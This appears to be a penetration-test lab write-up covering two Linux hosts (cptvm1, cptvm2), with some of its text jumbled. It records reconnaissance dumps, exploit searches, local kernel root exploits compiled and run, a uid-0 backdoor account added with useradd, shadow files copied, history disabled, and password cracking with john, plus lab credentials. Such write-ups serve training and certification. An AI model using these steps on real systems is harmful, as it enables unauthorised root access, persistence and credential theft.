(rpc #100024) User accounts: adm. 111. cptvm1. nfsnobody. news.18-8 TCP ports: 22. /usr/bin/at. /usr/bin/rsh. Penetration of cptvm1 i. /usr/sbin/ping6. apache. rpcuser. shutdown. news.104) Operating system: Linux Kernel version: Linux 2.40 (Red Hat Linux) 686/tcp rquotad 1-2 (rpc #100011) 993/tcp imaps 995/tcp pop3s 6000/tcp X11 32768/tcp status 1 (rpc #100024) 32770/tcp mountd 1-3 (rpc #100005) UDP ports: 7.0. /sbin/unix_chkpwd. /sbin/umount. /bin/mount. pcap. halt. halt. /sbin/mount. /media/. pcap. mailnull. /usr/sbin/suexec. user.3 (protocol 2. root. squid. named. /sbin/unix_chkpwd. cptvm1. /sbin/mount. /usr/bin/newgrp. /usr/bin/newgrp. root. /usr/lib/squid/pam_auth. 37. /usr/bin/crontab. /usr/X11R6/bin/XFree86. nscd. uucp. /usr/kerberos/bin/ksu. /bin/su. xfs Files that execute as root: /usr/bin/sudo. /bin/su. /usr/bin/chage. sshd sync. /bin/mount. rpcuser. bin. /bin/ping. apache. 123. /usr/sbin/ccreds_validate. /usr/bin/at. /bin/ping6. ftp. vcsa. /sbin/pwdb_chkpwd. daemon. gopher.nfs. 939 TCP services: 22/tcp ssh OpenSSH 4.6. /usr/bin/Xorg.168. ntp. /usr/sbin/traceroute6. vcsa. /usr/bin/rlogin. /usr/libexec/openssh/sshkeysign. cptvm2/linux G. mail.nfs. avahi. /usr/bin/rcp. operator. /usr/bin/gpasswd. cptvm2/linux cptvm2 (192. sshd. daemon. games. lp. /usr/bin/lppasswd. /usr/bin/chsh. /usr/libexec/openssh/ssh-keysign.org The list of files designated to execute as root was processed to gain . cptvm2. mail. /usr/sbin/usernetctl Username/password: cptvm1/windows.315rh 199/tcp smux Linux SNMP multiplexer 443/tcp ssl/http Apache httpd 2. $ grep exploits\/local exploits_list.txt | grep 2_200.anyside.. $4 }' suid_root_200../commands/basename- .tgz exploits_list. This list would be used to search against the anyside.Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit 2006-01- .only the base name of the file.Rocks Clusters <= 4./basename_200. $ awk '{ print "basename ".txt.txt > possible_local_200.txt $ cat possible_local_200.Rocks Clusters <= 4.org/exp/exploits/local/2006071503.txt 2006-07-15.org exploit list.db.org/exp/exploits/local/2006030101.txt possible_local_200.txt XFree86 at chage chfn chsh crontab gpasswd inndstart lppasswd mount newgrp pam_timestamp_check passwd ping ping6 pwdb_chkpwd rcp rlogin rnews rsh ssh-keysign startinnfeed su sudo suexec traceroute traceroute6 umount unix_chkpwd userhelper userisdnctl usernetctl The list of exploits used during the remote exploit search was re-used to search for local exploits on the cptvm1 host./ .1 (mount-loop) Local Root Exploit 2006-07-15.org/exp/exploits/local/2006071502.txt possible_remote_200.txt $ chmod +x basename_200.anyside.txt.http://www.anyside.txt $ .txt.txt | sort -u > basename-2_200.txt $ cat basename-2_200./ exploits_list.http://www.txt > basename_200.txt $ ll total 1672 drwxr-xr-x 7 matt matt 238 Feb 21 14:47 drwxr-xr-x 15 matt matt 510 Feb 21 14:47 -rw-r--r-1 matt matt 126720 Feb 6 14:40 -rw-r--r-1 matt matt 702666 Sep 21 05:52 -rw-r--r-1 matt matt 1699 Feb 15 20:34 -rw-r--r-1 matt matt 9376 Feb 6 14:43 -w -i -f .1 (umount-loop) Local Root Exploit 2006-03-01.http://www. anyside.Sudo 1..c.1 . Revision 0.txt.anyside.8p local root exploit” and “The same vulnerability to x_hpux11i_nls_ct.1. This leaves us with 3 possible exploits: “Sudo <= 1.anyside. The “SquirrelMail 3.passwd Disclosure Exploit 2005-11-09.http://www..3.http://www.1 Change Passwd Plugin Local Buffer Overflow Exploit” and “cdrecord $RSH exec() SUID Shell Creation” exploits can also be ruled out as they are for applications that don't exist on the host.c. The results of the search were 13 possible exploits.txt.3.org/exp/exploits/local/2005110903.25.devel.SquirrelMail 3.anyside..http://www. < 5.txt.6.3. The “Rocks Clusters <= 4. “Sudo 1. [cptvm1@cptvm1 commands]$ X -version XFree86 Version 4.1 1.txt.com .anyside. 2004-9-11.” and “Local root exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4. “SuSE Linux <= 9.c.1 (umount-loop) Local Root Exploit”.anyside..Local root exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4. Written to work on Redhat 7.SuSE Linux <= 9.http://www. Release 6.org/exp/exploits/local/r57sudo.sudo exploit.sh.6 Build Operating System: Linux 2.x .3. Written to work on Redhat 7.2.c.8p local root exploit .1 .redhat.. 10 (chfn) Local Root Privilege Escalation Exploit 2005-07-04.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit 2005-11-08.4) master. “Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit”.anyside. The version of Xfree86 was found to be version 4..org/exp/exploits/local/2005070403.1 (mount-loop) Local Root Exploit”.8p Pathname Validation Local Root Exploit (openbsd)”.FreeBSD (4.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit”.”.c..0 (Red Hat Linux release: 4.3.4) master.6.The same vulnerability to x_hp-ux11i_nls_ct.1 . “OpenBSD sudo 1.1.6.anyside. < 5.3.anyside.4. “Rocks Clusters <= 4.org/exp/exploits/local/2005110902.3.6.3. “sudo exploit.6.0.x using xlock. Thus eliminating Xfree86 from the list of potential exploits.0-2) Release Date: 27 February 2003 X Protocol Version 11.passwd Disclosure Exploit”.org/exp/exploits/local/2005110801.org/exp/exploits/local/xlock-XLOCALEDIR.org/exp/exploits/local/2006012501.Sudo <= 1.6.x ..but exploit ping command to get root shell 2004-9-19. 10 (chfn) Local Root Privilege Escalation Exploit”.anyside..txt.org/exp/exploits/local/x_hpux_11i_nls_cu. “FreeBSD (4.org/exp/exploits/local/cdrecordsuidshell.8p Pathname Validation Local Root Exploit (openbsd) .OpenBSD sudo 1.20-3bigmem i686 [ELF] Build Date: 27 February 2003 Build Host: porky.http://www.cdrecord $RSH exec() SUID Shell Creation .3.txt..but exploit ping command to get root shell” exploits can be ruled out as they are written for operating systems different than the one we are on.c.2.http://www..2.1.1 Change Passwd Plugin Local Buffer Overflow Exploit 2005-11-09.org/exp/exploits/local/sudo-exploit..http://www.http://www.http://www.http://www.x using xlock.2. 2-5)) #1 Thu Mar 13 17:54:28 EST 2003 The version of sudo was found to be 1. Instead of a typical buffer overflow exploit.devel.6. chfn.org web site. 24 exploits in total. This enables a local user with access to the inndstart program to create their own innd.Before reporting problems. rsh.conf configuration file. The “sudo exploit” exploit doesn't provide enough information about its requirements to rule it out. The remaining exploits.org Searches for exploits of at. more research into this exploit was suspended. Without a more detailed description. chage. To make things easier.XFree86. check http://www.Org/ to make sure that you have the latest version. Most of the exploits were eliminated due to mismatches on the operating system or version. it was downloaded and the code reviewed. traceroute. a bin directory was created within the “cptvm1” user's home directory. crontab. ping. . An environment variable named INNCONF can be defined to point to the location of the inn. unix_chckpwd.2 20030222 (Red Hat Linux 3. compiled and tested. were downloaded.2. this exploit was caused by a poorly planned application feature. umount. A search for “inndstart” provided an interesting exploit. newgrp. rnews. Module Loader present OS Kernel: Linux version 2. chsh. rlogin. Unfortunately. sudo. passwd. No successful exploits for the executables listed above were found. Attempting to download the exploit resulted in a 404 error from the anyside.conf file with a "pathrun" component pointing to a directory owned by root and defining a program of their choosing to be executed as root. [cptvm1@cptvm1 commands]$ sudo -V Sudo version 1. Local exploit research via secwatch.4.6.com) (gcc version 3.redhat. So.6. suexec. ii. reviewed.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit”.6 The version of sudo fits within the requirements for the “ Sudo <= 1. this exploit relies on an entry within the /etc/sudoers file that points to a file the user has full access to modify. It should be noted that the gcc compiler on the cptvm1 host was named gcc296. a symbolic link named gcc was created for gcc296 and the bin directory was added to the PATH.20-8 (bhcompile@porky. ping6. rcp. pam_timestamp_check. mount.2. lppasswd. userhelper and xfree86 returned quite a number of results. This situation does not exist on the cptvm1 host. org. A search on milw0rm. when the same search string was entered directly on a site. In several cases. the “Linux Kernel 2. iii. The quality of the exploit code on milw0rm. the secwatch.com as the primary search site was made.While this exploit sounded promising.x-2.4.org search aggregates exploit search results from several other sites into a single result page. With the issues found with the search mechanism of secwatch. ruling this exploit out.com for “linux kernel 2. .org site provides a search mechanism that is superior to anyside.20. the search mechanism only appears to work optimally with single words. The “Linux Kernel 2.4".org. a switch to milw0rm. Ultimately.4. Immediately. Illustration 1: Milw0rm search results for "linux kernel 2. a search using multiple words received no results back from secwatch. multiple exploits were found. The secwatch. Unfortunately. Privilege escalation using a Kernel VMA exploit Overall. the ability to change the ownership of a directory/file to root is limited on the cptmv1 host.4.6.22 "do_brk()" local Root Exploit (PoC)” exploit can also be removed as the kernel version in use is 2.org. However.com appears to be quite a bit better than the code on the other sites that were searched.x Assembler Inline Function Local DoS Exploit” exploit can be removed from the list as it isn't a root exploit.4” resulted in the following exploits. 4/2.c [cptvm1@cptvm1 kernel-uselib]$ ll total 56 drwxr-xr-x 2 cptvm1 cptvm1 4096 Jan 28 02:10 drwxr-xr-x 42 cptvm1 cptvm1 4096 Feb 14 2009 -rwxrwxr-x 1 cptvm1 cptvm1 27027 Jan 28 02:10 -rw-r--r-1 cptvm1 cptvm1 18774 Feb 14 2009 [cptvm1@cptvm1 kernel-uselib]$ .6 bluez Local Root Privilege Escalation Exploit (update)”.4. “Linux Kernel 2. “Linux Kernel 2.4 uselib() Privilege Elevation Exploit” resulted in a shell with root access. While setting the password to a variant of a dictionary word seemed like a good idea./ .x uselib() Local Privilege Escalation Exploit”. uid=0 sh-2. [+] race won maps=58028 expanded VMA (0xbfffc000-0xffffe000) [!] try to exploit 0xd096c000 [+] gate modified ( 0xffec9523 0x0804ec00 ) [+] exploited. “Linux Kernel 2. After the creation of the account.05b# iv..x / 2.6 x86-64 System Call Emulation Exploit”. “Linux Kernel 2./uselib . [cptvm1@cptvm1 kernel-uselib]$ gcc -o uselib uselib..0xdf548000 Wait. Maintaining access via creation of a new “r00t” account After the successful use of the Kernel VMA exploit. The Tim Hsu.. compiled and executed.x mremap() bound checking Root Exploit”.4. “Linux Kernel 2. 2005-01-27. map_base=0xbf800000 [+] vmalloc area 0xcfc00000 .05b# export PATH=/usr/bin:/usr/sbin:/bin:/sbin sh-2. sh-2.6./ uselib* uselib.05b# env TERM=vt100 PWD=/home/cptvm1/cpt/exploits/kernel-uselib SHLVL=1 HISTFILE=/dev/null _=/bin/env sh-2.4 uselib() Privilege Elevation Exploit” and “Linux Kernel 2.05b# id uid=0(root) gid=0(root) groups=501(cptvm1) sh-2.4/2.This left 5 exploits.c [+] SLAB cleanup child 1 VMAs 32 [+] moved stack bfffd000. consistent root access to the cptvm1 host was required.05b# useradd -u 0 -o -g 0 -d /root r00t . The exploits were taken in order. The creation of a new user account having the same user id and group id as the real root account was accomplished via the standard linux useradd script. this caused the shadow password cracking phase to take quite a bit longer. the password was set to “expl0ited”. task_size=0xc0000000. the gathering of the shadow password file could be accomplished. the “john” utility was used. sh-2. In this case.05b# 512 Feb 15 02:15 gshadow 1206 Feb 15 02:15 shadow H. the shadow password file was copied within the shell created by the Kernel VMA exploit. However. Gathering the shadow password file With the successful creation of a method to gain root access in the future.05b# cd /tmp sh-2. bt cptvm1 # john --session=cptvm1 shadow Loaded 5 password hash (FreeBSD MD5 [32/32]) digital (user) windows (cptvm1) linux (cptvm2) guesses: 3 time: 0:05:24:14 (3) c/s: 5722 trying: tubt Session aborted bt cptvm1 # john -show shadow user:digital:14019:0:99999:7::: cptvm1:windows:14019:0:99999:7::: cptvm2:linux:14019:0:99999:7::: 3 password hashes cracked. research on exploits for the cptvm2 host was started. the root and r00t accounts took quite a bit longer to crack. sh-2. cptvm1 and cptvm2 user accounts were cracked (not really required as they had already been brute forced). the process of cracking the passwords contained within was started. “cptvm1” and “cptvm2” With full access to the shadow password file. Within a few minutes the passwords for the user. 2 left . Cracking passwords of the cptvm1 host i. While not required. the groups shadow file was also copied.sh-2. However.05b# ls -alF gshadow shadow -rw-rw-rw1 root root -rw-rw-rw1 root root sh-2. In this case.05b# cp /etc/gshadow /tmp sh-2. Cracking of “user”.05b# cp /etc/shadow /tmp sh-2. New password: BAD PASSWORD: it is based on a dictionary word Retype new password: passwd: all authentication tokens updated successfully. While the john session named “cptvm1” was left to run.05b# chmod a+rw /tmp/shadow sh-2.05b# passwd r00t Changing password for user r00t.05b# chmod a+rw /tmp/gshadow sh-2.05b# v. it could have also been gathered via the new “r00t” account. 17.6. “Linux Kernel 2.24 vmsplice Local Root Exploit” exploits can also be removed from the list as they aren't for the 2.4 sys_prctl() Local Root Exploit (4)”. the “Linux Kernel 2. .13 <= 2. the “Linux Kernel 2.27.6.6. Privilege escalation using a Kernel vmsplice exploit Since the cptvm1 host fell to a kernel exploit.6. “Linux Kernel 2. “Linux Kernel 2.6.2.17.6.2.6.4 prctl() Local Root Exploit (logrotate)” and “Linux Kernel 2. A search on milw0rm.6.6".com for “linux kernel 2.17.6.13 <= 2. In addition. Illustration 2: Milw0rm search results for "linux kernel 2.4 sys_prctl() Local Root Exploit”. Immediately.24-1 Local DoS Exploit”.6.x sys_timer_create() Local Denial of Service Exploit” and “Linux Kernel 2.6.17.6.6” resulted in the following exploits.6.x Firewall Logging Rules Remote DoS Exploit” exploits can be removed from the list as they aren't root exploits.4 sys_prctl() Local Root Exploit (2)”.13 <= 2.7-generic .6.6. “Linux Kernel 2. “Linux Kernel 2.6.6. time was not spent researching third party applications and system utility exploits on the cptvm2 host. Penetration of cptvm2 i.bt cptvm1 # john --session=cptvm1 --users=root shadow Loaded 1 password hash (FreeBSD MD5 [32/32]) I.6.18 .18 version of the kernel.23 .13 <= 2.2.4 sys_prctl() Local Root Exploit (3)”.13 <= 2.17. the password was set to “windows”.This left 2 exploits. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 . “Linux Kernel 2. The qaaz.2-gnome2 WINDOWID=48234577 USER=cptvm1 . 2008-02-09..1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed.. The previous password generation mistake of setting a “tough” password was not repeated.c [cptvm1@localhost kernel26_vmsplice]$ . 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 . [root@localhost kernel26_vmsplice]# env SSH_AGENT_PID=3134 HOSTNAME=localhost. Maintaining access via creation of a new “r00t” account After the successful use of the Kernel vmsplice exploit. “Linux Kernel 2.2. [cptvm1@localhost kernel26_vmsplice]$ ll total 16 -rw-r--r-. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7f36000 .17 – 2.1 vmsplice Local Root Exploit” resulted in a shell with root access.24.6. 0xb7f68000 [+] root [root@localhost kernel26_vmsplice]# id uid=0(root) gid=0(root) groups=500(cptvm1) [root@localhost kernel26_vmsplice]# ii.c [cptvm1@localhost kernel26_vmsplice]$ gcc -o jessica_biel_naked_in_my_bed jessica_biel_naked_in_my_bed.1 cptvm1 cptvm1 6293 Feb 15 2009 jessica_biel_naked_in_my_bed..localdomain TERM=xterm SHELL=/bin/bash DESKTOP_STARTUP_ID= HISTSIZE=1000 GTK_RC_FILES=/etc/gtk/gtkrc:/home/cptvm1/.6.6.x chown() Group Ownership Alteration Exploit”. The creation of a new user account having the same user id and group id as the real root account was accomplished via the standard linux useradd script.24..1 vmsplice Local Root Exploit” and “Linux Kernel 2.17 . consistent root access to the cptvm2 host was required./ jessica_biel_naked_in_my_bed ----------------------------------Linux vmsplice Local Root Exploit By qaaz ----------------------------------[+] mmap: 0x0 .gtkrc-1. The exploits were taken in order.6. After the creation of the account.6. compiled and executed.c [cptvm1@localhost kernel26_vmsplice]$ ll total 28 -rwxrwxr-x 1 cptvm1 cptvm1 8522 Feb 7 04:05 jessica_biel_naked_in_my_bed -rw-r--r-. 33 . it could have also been gathered via the new “r00t” account.32:*.31:*. New UNIX password: BAD PASSWORD: it is based on a dictionary word Retype new UNIX password: passwd: all authentication tokens updated successfully.31:*.Z=00. [root@localhost kernel26_vmsplice]# cp /etc/shadow /tmp [root@localhost kernel26_vmsplice]# chmod a+rw /tmp/shadow [root@localhost kernel26_vmsplice]# cd /tmp [root@localhost tmp]# ls -alF shadow -rw-rw-rw.0 HISTFILE=/dev/null G_BROKEN_FILENAMES=1 XAUTHORITY=/tmp/.35: SSH_AUTH_SOCK=/tmp/ssh-aqCddQ3075/agent.rpm=00.41:ex=00.3075 GNOME_KEYRING_SOCKET=/tmp/keyring-euEoqc/socket USERNAME=cptvm1 SESSION_MANAGER=local/localhost.32:*.bz=00.31:*.arj= 00.z=00.1 root root 1235 Feb 7 04:08 shadow [root@localhost tmp]# .gif=00.31:*.xbm=00.sh=00.bat=00.cpio=00.31:*.35:*.32:*.35:bd=40.32:*.32 :*. [root@localhost kernel26_vmsplice]# passwd r00t Changing password for user r00t.35:*.tz=00.05. Gathering the shadow password file With the successful creation of a method to gain root access in the future. the gathering of the shadow password file could be accomplished.32:*. However.31:*.31:*.36:pi=40.05.xpm=00.LS_COLORS=no=00:fi=00:di=00. the shadow password file was copied within the shell created by the Kernel vmsplice exploit.35:*.gz=00.lzh=00.tif=00.35: *.37.31:*.jpg=00.37.tar=00.UTF-8 GDMSESSION=default SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass SHLVL=3 HOME=/home/cptvm1 GNOME_DESKTOP_SESSION_ID=Default LOGNAME=cptvm1 CVS_RSH=ssh DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbusyuVqOWjtSW.com=00.31:*.sh %s DISPLAY=:0.31:*.32:*.41:mi=01.localdomain:/tmp/.bz2 =00.32:*.tgz=00.csh=00.01:cd=40.zip=00.34:ln=00. In this case.taz=00.exe=00.btm=00. Not copying any file from skel directory into it.31:*.31:*.png=00.cmd=00.31:*. [root@localhost kernel26_vmsplice]# iii.01:or=01.ICE-unix/3075 PATH=/usr/kerberos/sbin:/usr/bin:/usr/sbin:/bin:/sbin:/usr/kerberos/bin:/usr/l ocal/bin:/usr/bin:/bin:/usr/X11R6/bin:/home/cptvm1/bin DESKTOP_SESSION=default MAIL=/var/spool/mail/cptvm1 GDM_XSERVER_LOCATION=local PWD=/home/cptvm1/cpt/exploits/kernel26_vmsplice INPUTRC=/etc/inputrc XMODIFIERS=@im=none LANG=en_US.35:*.33:so=00.31:*.bmp=00.33.35:*.gdmI40NOU COLORTERM=gnome-terminal _=/usr/bin/env [root@localhost kernel26_vmsplice]# useradd -u 0 -o -g 0 -d /root r00t useradd: warning: the home directory already exists.guid=f9418d49bbcbb5875e2b080cbf709f00 LESSOPEN=|/usr/bin/lesspipe. Cracking of “cptvm1”. 631. 161. 110. 993. 22. 32768. 21. 6000. 199. the systems of interest are configured as follows: cptvm1 (192. 0 left From the information gathered during this step. 683 UDP services: 7/udp echo 13/udp daytime 37/udp time (32 bits) 111/udp rpcbind 2 (rpc #100000) 123/udp ntp . 111. 23. 143.99) 23/tcp telnet Linux telnetd 79/tcp finger Linux fingerd 80/tcp http Apache httpd 2. 80. “cptvm2”.4. 79.200) Operating system: Linux Kernel version: 2.1. This was due to the existence of the root password within the standard john wordlist.40 (Red Hat Linux) 686/tcp rquotad 1-2 (rpc #100011) 993/tcp imaps 995/tcp pop3s 6000/tcp X11 32768/tcp status 1 (rpc #100024) 32770/tcp mountd 1-3 (rpc #100005) UDP ports: 7. bt cptvm2 # john --session=cptvm2 shadow Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [32/32]) admin (root) windows (cptvm1) windows (r00t) linux (cptvm2) guesses: 4 time: 0:00:06:13 (3) c/s: 4533 trying: linux bt cptvm2 # john -show shadow root:admin:14019:0:99999:7::: cptvm1:windows:14019:0:99999:7::: cptvm2:linux:14019:0:99999:7::: r00t:windows:14282:0:99999:7::: 4 password hashes cracked. Cracking passwords of the cptvm2 host i.20-8 TCP ports: 7. 686.40 (Red Hat Linux) 109/tcp POSSIBLY pop2 110/tcp pop3 ipopd 2001.J. 443.78rh 111/tcp rpcbind 2 (rpc #100000) 143/tcp imap UW Imapd 2001. 111. 995.315rh 199/tcp smux Linux SNMP multiplexer 443/tcp ssl/http Apache httpd 2. the entire process took just over 6 minutes to complete. Using only the default dictionary within john. “root” and “r00t” The cracking of the cptvm2 accounts was trivial in comparison to the time the cptvm1 host had already taken (over 10 hours).1. 123.5p1 (protocol 1. 109. 32770 TCP services: 7/tcp echo 21/tcp ftp vsftpd 1.168.0.0. 162. 13. 37.3 22/tcp ssh OpenSSH 3. /usr/kerberos/bin/ksu. /usr/sbin/userisdnctl. /usr/bin/lppasswd.nfs.6. nfsnobody. uucp. smmsp. /usr/bin/chsh. /bin/mount. rpcuser. /usr/bin/passwd. /usr/bin/chfn. news. /usr/sbin/usernetctl Username/password: user/digital. root/admin K. /usr/sbin/traceroute. /usr/bin/Xorg.168. /usr/bin/at. rpm. /usr/sbin/userhelper. mailnull. /bin/mount. nscd. rpc. apache. /bin/ping. avahi. cptvm1. apache. cptvm1. distcache. /usr/bin/sudoedit. rpcuser. smmsp. ntp operator. xfs Files that execute as root: /usr/bin/sudo. ftp. rpc. /usr/bin/chage. haldaemon. /sbin/umount. gdm.18-8 TCP ports: 22. ftp.hal-mtablock. research into why was begun. /sbin/pwdb_chkpwd. halt. uucp. sshd. /usr/bin/rcp.nfs4. /sbin/mount. Therefore.nfs4. named. postgres. /bin/ping. xfs Files that execute as root: /usr/bin/sudo. Cracking of “root” and “r00t” At this point. /usr/bin/at. shutdown. bin. /usr/sbin/ccreds_validate. The original assumption was that the default john wordlist would most likely be optimized for password cracking. /bin/umount. /usr/lib/news/bin/startinnfeed. halt. mail. squid. nfsnobody. /usr/bin/crontab. vcsa. pcap. /sbin/unix_chkpwd. /usr/bin/chsh. /usr/sbin/suexec. r00t/windows. cptvm2. /media/. /usr/lib/news/bin/inndstart. /sbin/pam_timestamp_check. gopher. news. With such a difference in the amount of john run time between the vptvm1 and cptvm2 hosts. /usr/bin/gpasswd.0) 111/tcp rpcbind 2 (rpc #100000) 939/tcp status 1 (rpc #100024) User accounts: adm. daemon. /sbin/mount. webalizer. Cracking passwords of the cptvm1 host – round 2 i. /bin/su. /usr/sbin/usernetctl Username/password: cptvm1/windows. gopher. /usr/bin/newgrp. lp. games. nobody. /usr/bin/chfn. nobody. nscd. /bin/su. /sbin/umount. rpm. gdm. squid. /sbin/unix_chkpwd.1. 939 TCP services: 22/tcp ssh OpenSSH 4. /bin/umount. cptvm1/windows. cptvm2/linux. /usr/bin/gpasswd. /usr/sbin/suexec. sshd sync. /usr/X11R6/bin/XFree86. it seemed logical that the rest of the passwords would most . webalizer. the default wordlist was used as is. /usr/bin/passwd. shutdown. sync. /usr/sbin/userhelper. /usr/sbin/ping6. /sbin/pam_timestamp_check. dbus. /usr/lib/news/bin/rnews. /usr/lib/squid/ncsa_auth. /bin/ping6. /usr/sbin/userisdnctl.nfs. games. root. /usr/bin/rsh. the john utility had been running for quite some time without success. cptvm2. pcap. root.161/udp snmp SNMPv1 server (public) 162/udp snmptrap 631/udp unknown 683/udp rquotad 1-2 (rpc #100011) User accounts: adm. /usr/bin/rsh. /usr/bin/rlogin. bin. ntp. /usr/libexec/openssh/ssh-keysign.3 (protocol 2. /usr/bin/rcp. lp. vcsa. user. /usr/libexec/openssh/sshkeysign. /usr/bin/rlogin. mail. 111. Comparing the default wordlist used by john to the one that had been used during the brute force hydra attack showed that the john wordlist was far smaller. daemon. /usr/bin/newgrp. cptvm2/linux cptvm2 (192. operator. named. /usr/lib/squid/pam_auth. mailnull. /usr/bin/chage. As all of the passwords discovered so far were standard dictionary words. /usr/sbin/traceroute6.104) Operating system: Linux Kernel version: Linux 2. 000 words. However..txt file as a wordlist was aborted.1 503 503 1097205 Feb 15 23:05 118051wordDictionary. The results were far more impressive than anticipated.txt shadow Loaded 1 password hash (FreeBSD MD5 [32/32]) expl0ited (r00t) guesses: 1 time: 0:00:00:09 100% c/s: 4707 trying: expl0ited .. With this in mind. a larger wordlist would be required./passwords/passwords. the aspell master english dictionary was dumped.rec bt cptvm1 # john --session=cptvm1 --users=r00t -wordlist=. bt cptvm1 # john --session=cptvm1-3 --users=root -wordlist=. john was able to crack the password in near record time.txt bt passwords # ll 118051wordDictionary.txt shadow Loaded 1 password hash (FreeBSD MD5 [32/32]) cavalry (root) guesses: 1 time: 0:00:00:02 100% c/s: 5511 trying: cavalry At this point. additional john sessions were created to use the googled password. I cheated and placed the “expl0ited” password in the wordlist. a john session was started to crack the r00t account.txt file and the newly generated aspell dumped file..txt 118051 matt. Within 2 seconds./passwords/118051wordDictionary.txt bt passwords # wc -l matt. the password for the root account had been cracked. bt cptvm1 # rm cptvm1. the initial john session was also aborted. certification crew! :) bt cptvm1 # john --session=cptvm1 --users=root shadow Loaded 1 password hash (FreeBSD MD5 [32/32]) guesses: 0 time: 0:10:53:47 (3) c/s: 5722 trying: 35885297 Session aborted Since we already know that the password to the r00t account is expl0ited. As expected.txt -rw-r--r-./passwords/118051wordDictionary. too.txt shadow Loaded 1 password hash (FreeBSD MD5 [32/32]) guesses: 0 time: 0:00:00:22 100% c/s: 5502 trying: Ôªø! In addtion. cleaned up and sorted.txt 118051wordDictionary. This resulted in a dictionary of roughly 118. this last step wasn't really required. the john session that had been started to use the googled password.txt With this new approach in mind. bt passwords # aspell dump master | sed s/\'//g | sort -u > matt. I want those 11 hours of my life back.likely be dictionary words. To generate this wordlist.txt bt passwords # mv matt. bt cptvm1 # john --session=cptvm1-2 --users=root -wordlist=. to be 100% complete. the systems of interest are configured as follows: cptvm1 (192. sshd sync. bin. /usr/bin/rcp.1. 21. cptvm1. gopher. rpm. halt.78rh 111/tcp rpcbind 2 (rpc #100000) 143/tcp imap UW Imapd 2001.315rh 199/tcp smux Linux SNMP multiplexer 443/tcp ssl/http Apache httpd 2. mailnull. /bin/umount. root. pcap. /usr/bin/passwd. apache. /usr/sbin/suexec. /usr/bin/crontab. /usr/lib/news/bin/rnews. user. 199. 995. 37. /bin/su. 13. /bin/ping.Ultimately.40 (Red Hat Linux) 686/tcp rquotad 1-2 (rpc #100011) 993/tcp imaps 995/tcp pop3s 6000/tcp X11 32768/tcp status 1 (rpc #100024) 32770/tcp mountd 1-3 (rpc #100005) UDP ports: 7. ftp. 79. 683 UDP services: 7/udp echo 13/udp daytime 37/udp time (32 bits) 111/udp rpcbind 2 (rpc #100000) 123/udp ntp 161/udp snmp SNMPv1 server (public) 162/udp snmptrap 631/udp unknown 683/udp rquotad 1-2 (rpc #100011) User accounts: adm. 631. 32770 TCP services: 7/tcp echo 21/tcp ftp vsftpd 1. 123. lp. ntp operator. 22. bt cptvm1 # john -show shadow root:cavalry:14019:0:99999:7::: user:digital:14019:0:99999:7::: cptvm1:windows:14019:0:99999:7::: cptvm2:linux:14019:0:99999:7::: r00t:expl0ited:14272:0:99999:7::: 5 password hashes cracked.99) 23/tcp telnet Linux telnetd 79/tcp finger Linux fingerd 80/tcp http Apache httpd 2. 32768. nfsnobody. 0 left From the information gathered during this step.4. gdm. 686. /usr/bin/chsh. shutdown. /usr/bin/rsh.168. rpc.1. cptvm2. 161. 111. daemon. /usr/lib/news/bin/startinnfeed. /usr/bin/chfn. /usr/bin/chage. /usr/sbin/traceroute6.40 (Red Hat Linux) 109/tcp POSSIBLY pop2 110/tcp pop3 ipopd 2001. 23.5p1 (protocol 1. nobody. /usr/sbin/userisdnctl. mail. 143. /usr/lib/news/bin/inndstart.20-8 TCP ports: 7. games. /usr/bin/at. 110. /usr/X11R6/bin/XFree86. xfs Files that execute as root: /usr/bin/sudo. all of the cptvm1 account passwords were cracked. /usr/sbin/userhelper. 111. /usr/sbin/usernetctl . /usr/bin/lppasswd. squid. 80. /usr/bin/gpasswd. postgres.3 22/tcp ssh OpenSSH 3. uucp.0. 6000. /usr/bin/newgrp. webalizer. /usr/libexec/openssh/ssh-keysign. /usr/bin/rlogin. nscd. smmsp. 993. /usr/sbin/traceroute. news. 109. /sbin/pwdb_chkpwd. /sbin/pam_timestamp_check. /usr/sbin/ping6. /bin/mount. vcsa. named.0. 443. rpcuser. /sbin/unix_chkpwd.200) Operating system: Linux Kernel version: 2. 162. it was found that certain searches don't perform well via secwatch.3 (protocol 2. root/cavalry cptvm2 (192. /usr/sbin/userisdnctl. /usr/bin/passwd. /usr/bin/newgrp. gopher. mailnull. With such a wide foot print for searches in mind. /usr/sbin/usernetctl Username/password: cptvm1/windows. nfsnobody. cptvm1/windows.0) 111/tcp rpcbind 2 (rpc #100000) 939/tcp status 1 (rpc #100024) User accounts: adm. mail. root/admin L. apache. gdm. Finally. For example. The cptvm1 host was then compromised via a VMA exploit. cptvm2/linux.Username/password: user/digital. /usr/lib/squid/ncsa_auth. ntp. halt. Searching exploit sites The quality of the exploits and exploit information varies radically between sites. sshd. /usr/libexec/openssh/sshkeysign. After gaining basic access to the cptvm1 host. sync. 111. /usr/sbin/suexec. /usr/bin/at.com site has good quality code but limited information on the background of the exploit. /usr/bin/Xorg. /sbin/mount. /bin/ping. shutdown. /usr/sbin/userhelper. Ultimate goal i.securityfocus.nfs. ii. bin. /usr/bin/rsh. vcsa. ftp. webalizer. /usr/lib/squid/pam_auth. /usr/bin/rlogin. root. news. /sbin/unix_chkpwd.org should be the preferred solution.168. . Cptvm1 and ctpvm2 hosts compromised The initial access to the cptvm1 was obtained by brute force password guessing of the “user” account. r00t/windows. squid. operator. /usr/sbin/ccreds_validate. r00t/expl0ited. /media/.18-8 TCP ports: 22. /usr/bin/sudoedit. smmsp. /bin/umount. /sbin/pam_timestamp_check. /sbin/umount. However.6. /sbin/umount. avahi. rpcuser. /usr/bin/rcp. daemon. lp. In contrast. /usr/bin/chsh. haldaemon. cptvm2/linux. Lessons learned i. /bin/su.org. cptvm1. uucp. 